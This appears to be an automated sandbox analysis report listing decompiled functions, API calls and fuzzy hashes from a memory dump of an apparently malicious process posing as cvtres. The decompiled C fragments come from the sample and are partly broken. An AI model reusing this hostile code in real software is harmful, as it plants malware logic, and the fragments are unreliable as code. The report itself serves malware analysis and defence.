                                                                        Function 004185CA Relevance: 1.5, APIs: 1, Instructions: 48filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 277 4185ca-4185cf 278 4185d1-4185dc 277->278 279 418626 277->279 280 4185dd-418621 call 4191d0 NtCreateFile 278->280 279->280 281 418628 279->281 281->279
                                                                        C-Code - Quality: 58%
                                                                        			E004185CA(void* __edx, void* __eflags) {
				void* _t33;

				_t33 = __edx;
				if (__eflags != 0) goto L5;
				_push(0x8dbaf913);
			}




                                                                        0x004185ca
                                                                        0x004185cf
                                                                        0x004185d0

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: f7cbd7fc0969414a674bc8ca99c4637e3e9ae287eb8b340a1f6027a3f84e3b2e
                                                                        • Instruction ID: abe82f64ce613578cb71296675caf8202f722367e04cf6f6b4f4fb7b7f85d329
                                                                        • Opcode Fuzzy Hash: f7cbd7fc0969414a674bc8ca99c4637e3e9ae287eb8b340a1f6027a3f84e3b2e
                                                                        • Instruction Fuzzy Hash: 5E0108B6205248AFCB04CF98DC95DEB37A9AF8C354F15424DFA0997241D630ED518BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004185D0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 285 4185d0-4185e6 286 4185ec-418621 NtCreateFile 285->286 287 4185e7 call 4191d0 285->287 287->286
                                                                        C-Code - Quality: 100%
                                                                        			E004185D0(void* __edx, void* _a4, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48, void* _a52) {
				void* _t32;

				_t32 = __edx;
			}




                                                                        0x004185d0

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004187AA Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 288 4187aa-4187ed call 4191d0 NtAllocateVirtualMemory
                                                                        C-Code - Quality: 64%
                                                                        			E004187AA(void* __eax, void* __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				void* _v117;
				long _t18;
				void* _t28;

				asm("daa");
				asm("clc");
				_t14 = _a4;
				_t5 = _t14 + 0xc60; // 0xca0
				E004191D0(_t28, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t18;
			}






                                                                        0x004187ab
                                                                        0x004187ae
                                                                        0x004187b3
                                                                        0x004187bf
                                                                        0x004187c7
                                                                        0x004187e9
                                                                        0x004187ed

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: fe1f0f85ede958bc9e1ef5048c91862cd464ba1909acd4de4755de50fe50b111
                                                                        • Instruction ID: 2c1a1dfb65638079a3be3993b81bac7282395dafd856929c9553ec9b074be529
                                                                        • Opcode Fuzzy Hash: fe1f0f85ede958bc9e1ef5048c91862cd464ba1909acd4de4755de50fe50b111
                                                                        • Instruction Fuzzy Hash: 89F058B1600209BFCB18CF88CC85EEB77A9AF88740F15822DFE0897241C230E811CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004187B0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 291 4187b0-4187c6 292 4187cc-4187ed NtAllocateVirtualMemory 291->292 293 4187c7 call 4191d0 291->293 293->292
                                                                        C-Code - Quality: 100%
                                                                        			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                        0x004187bf
                                                                        0x004187c7
                                                                        0x004187e9
                                                                        0x004187ed

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418700 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                        0x00418703
                                                                        0x00418706
                                                                        0x0041870f
                                                                        0x00418717
                                                                        0x00418725
                                                                        0x00418729

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2761004eb95f02738bc309f5d24f8d956e2f23719ec108cf351ddce56bb5ee19
                                                                        • Instruction ID: 1a91d968fbf1310775abda7a303ca556138b39c83ad8e3d9c7e4045a37657ae0
                                                                        • Opcode Fuzzy Hash: 2761004eb95f02738bc309f5d24f8d956e2f23719ec108cf351ddce56bb5ee19
                                                                        • Instruction Fuzzy Hash: 33900265251000030105A559074450700A6A7D5395392C021F2005550CDA6188617261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 3539998f3dd9bc01aacca39754a86cd6a87c685ab5adb639c289e3f60578aeb9
                                                                        • Instruction ID: 95efc1c94ec426aeff60f4ca6ca9fcbee4abad990542157be4a3b9269b2ed3d0
                                                                        • Opcode Fuzzy Hash: 3539998f3dd9bc01aacca39754a86cd6a87c685ab5adb639c289e3f60578aeb9
                                                                        • Instruction Fuzzy Hash: 909002A124200003410571594454616406AA7E0245B92C021E2004590DC96588917265
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d01eadbc387f1a4fb9bda618ffaea2fc5cb65e82d32a0270fd6411ff3246f9dc
                                                                        • Instruction ID: 8bce64571c547cfbfcff1414a31ee994f5cbd2beff60dbb4c6cfb2cadbaa00b1
                                                                        • Opcode Fuzzy Hash: d01eadbc387f1a4fb9bda618ffaea2fc5cb65e82d32a0270fd6411ff3246f9dc
                                                                        • Instruction Fuzzy Hash: 4290027124100402D100659954486460065A7E0345F92D011A6014555ECAA588917271
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7f6e0dcecf7168d30310db2c3086bb26f36e5ed5d29a93ce171806c3354f6278
                                                                        • Instruction ID: c702510239fabc198285d63ee9045488ecf07698ccc631bab54803dd01ae3d16
                                                                        • Opcode Fuzzy Hash: 7f6e0dcecf7168d30310db2c3086bb26f36e5ed5d29a93ce171806c3354f6278
                                                                        • Instruction Fuzzy Hash: F790027135114402D110615984447060065A7D1245F92C411A1814558D8AD588917262
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: daa4de9a177b440425765744d17eba37968504f8beee3cf688e4616793012957
                                                                        • Instruction ID: 320480bfe6fd128fadf20b1c184ee2f8039c9894746cc1eabb2dd8de9540223e
                                                                        • Opcode Fuzzy Hash: daa4de9a177b440425765744d17eba37968504f8beee3cf688e4616793012957
                                                                        • Instruction Fuzzy Hash: 4090026925300002D1807159544860A0065A7D1246FD2D415A1005558CCD5588697361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b4938416815dd365394d5eaecc1a4c411fce7358103b33e5c9c20ae707d5e4bf
                                                                        • Instruction ID: 9b3048f7687becbea1aa1bde6e7cb434a42b135824bc99dbda4bed0c9d3512af
                                                                        • Opcode Fuzzy Hash: b4938416815dd365394d5eaecc1a4c411fce7358103b33e5c9c20ae707d5e4bf
                                                                        • Instruction Fuzzy Hash: 8090026134100003D140715954586064065F7E1345F92D011E1404554CDD5588567362
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2297a4b4a97f2254227aadb10c2c3945b29d142b638c14716106c91230d04a3c
                                                                        • Instruction ID: 962f1c62a197713b9ec9bbd49c0837da1ec0a9087b655b544be057e5ddae6e4f
                                                                        • Opcode Fuzzy Hash: 2297a4b4a97f2254227aadb10c2c3945b29d142b638c14716106c91230d04a3c
                                                                        • Instruction Fuzzy Hash: 3990027124100802D1807159444464A0065A7D1345FD2C015A1015654DCE558A5977E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a7365c4f1c4dc9d68a09ff5bc094691ac27bb0dcfb937049d70df54e496a776e
                                                                        • Instruction ID: 4b228176f7fc362183fb2806146ac6e1855cbf22d4b4478b75d8fe3236f1c13c
                                                                        • Opcode Fuzzy Hash: a7365c4f1c4dc9d68a09ff5bc094691ac27bb0dcfb937049d70df54e496a776e
                                                                        • Instruction Fuzzy Hash: F190027124108802D1106159844474A0065A7D0345F96C411A5414658D8AD588917261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 73d277b35b308447ead599439448038af486ecb5459b58ff54f3dee0393bb431
                                                                        • Instruction ID: 0f56da315e66bc8a5aca5bae1453141b37ec5d7c6371887650259312e0629e96
                                                                        • Opcode Fuzzy Hash: 73d277b35b308447ead599439448038af486ecb5459b58ff54f3dee0393bb431
                                                                        • Instruction Fuzzy Hash: D59002B124100402D140715944447460065A7D0345F92C011A6054554E8A998DD577A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 71fb83c8c7245ef54aba9eb55a8c0937362eec2c457011c3a11aa94126de8c6a
                                                                        • Instruction ID: c62d4fc3ac0f076a0c7188a9c65d837c81b9d29340a51f031cd0fd75fa7717ad
                                                                        • Opcode Fuzzy Hash: 71fb83c8c7245ef54aba9eb55a8c0937362eec2c457011c3a11aa94126de8c6a
                                                                        • Instruction Fuzzy Hash: CA9002A138100442D10061594454B060065E7E1345F92C015E2054554D8A59CC527266
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 77e06e06d2703f4ad4874059bc7e4d16332af5113c17d8ba23b12000b7d9c6a3
                                                                        • Instruction ID: a84ff1aefa92c7be8531cf3513da0d42deee783276444be4659d17355b364aca
                                                                        • Opcode Fuzzy Hash: 77e06e06d2703f4ad4874059bc7e4d16332af5113c17d8ba23b12000b7d9c6a3
                                                                        • Instruction Fuzzy Hash: D1900261282041525545B15944445074066B7E02857D2C012A2404950C89669856F761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 466cc22a572368f982366e93ed88a523f5ab23c6d49fb00f563defb89ed2b3f4
                                                                        • Instruction ID: 336159949bf489cd21b7b1e15de6161c222143ef385bd60c4ca2e1d5794529ed
                                                                        • Opcode Fuzzy Hash: 466cc22a572368f982366e93ed88a523f5ab23c6d49fb00f563defb89ed2b3f4
                                                                        • Instruction Fuzzy Hash: 6490027124100413D111615945447070069A7D0285FD2C412A1414558D9A968952B261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 676e20a77edf9bc9e6e14322a767f7d6167643c5899fa535555f632eef7024b4
                                                                        • Instruction ID: 5863242e933477a41ad5fcf0467fc90af48dbc02dd0e0316795ff6bb0acdc29d
                                                                        • Opcode Fuzzy Hash: 676e20a77edf9bc9e6e14322a767f7d6167643c5899fa535555f632eef7024b4
                                                                        • Instruction Fuzzy Hash: C390026164100502D10171594444616006AA7D0285FD2C022A2014555ECE658992B271
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 77eff9e6c8f7f6a9ab7340f1cbc7c1020f668aef1e841a9f1dfd4bd9a243e603
                                                                        • Instruction ID: 6bfeed5eb1fd113b1cc7f3247609af5c25bc2a9ff000b960529b8f2446ad0742
                                                                        • Opcode Fuzzy Hash: 77eff9e6c8f7f6a9ab7340f1cbc7c1020f668aef1e841a9f1dfd4bd9a243e603
                                                                        • Instruction Fuzzy Hash: A290026125180042D20065694C54B070065A7D0347F92C115A1144554CCD5588617661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5328beb82d84731d3fc5a4dbf9308d22aabe85066744bc91e246b2a6c7266430
                                                                        • Instruction ID: 4ff1933c659fcb2548e9788521cf4a6f95c5fae96f1e4e920cb695f103964b66
                                                                        • Opcode Fuzzy Hash: 5328beb82d84731d3fc5a4dbf9308d22aabe85066744bc91e246b2a6c7266430
                                                                        • Instruction Fuzzy Hash: 4090027124140402D1006159485470B0065A7D0346F92C011A2154555D8A65885176B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d6a3a4b7fc277903f6f2dd9f6e40634e7388b5bce5cf132f78431092aaa6c5d5
                                                                        • Instruction ID: f0be5c4a98dd095dca9f25c30af28b1b1d17ad178db57a69b4c9ded5716efa9a
                                                                        • Opcode Fuzzy Hash: d6a3a4b7fc277903f6f2dd9f6e40634e7388b5bce5cf132f78431092aaa6c5d5
                                                                        • Instruction Fuzzy Hash: 5C900261641000424140716988849064065BBE1255792C121A1988550D8999886577A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004088C0 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E004088C0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						E0041A750( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                        0x004088cb
                                                                        0x004088d3
                                                                        0x004088d5
                                                                        0x004088da
                                                                        0x004088df
                                                                        0x004088f2
                                                                        0x004088f7
                                                                        0x00408900
                                                                        0x0040890c
                                                                        0x0040891f
                                                                        0x00408924
                                                                        0x00408927
                                                                        0x00408930
                                                                        0x00408942
                                                                        0x00408947
                                                                        0x0040894c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040894e
                                                                        0x00408952
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00408954
                                                                        0x00000000
                                                                        0x00408952
                                                                        0x00408956
                                                                        0x00408959
                                                                        0x0040895f
                                                                        0x00408961
                                                                        0x0040896c
                                                                        0x00408971
                                                                        0x00408974
                                                                        0x00408981
                                                                        0x0040898c
                                                                        0x0040898e
                                                                        0x00408994
                                                                        0x00408998
                                                                        0x0040899b
                                                                        0x0040899b
                                                                        0x004089a2
                                                                        0x004089a5
                                                                        0x004089aa
                                                                        0x004089b7
                                                                        0x004088e6
                                                                        0x004088e6
                                                                        0x004088e6

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
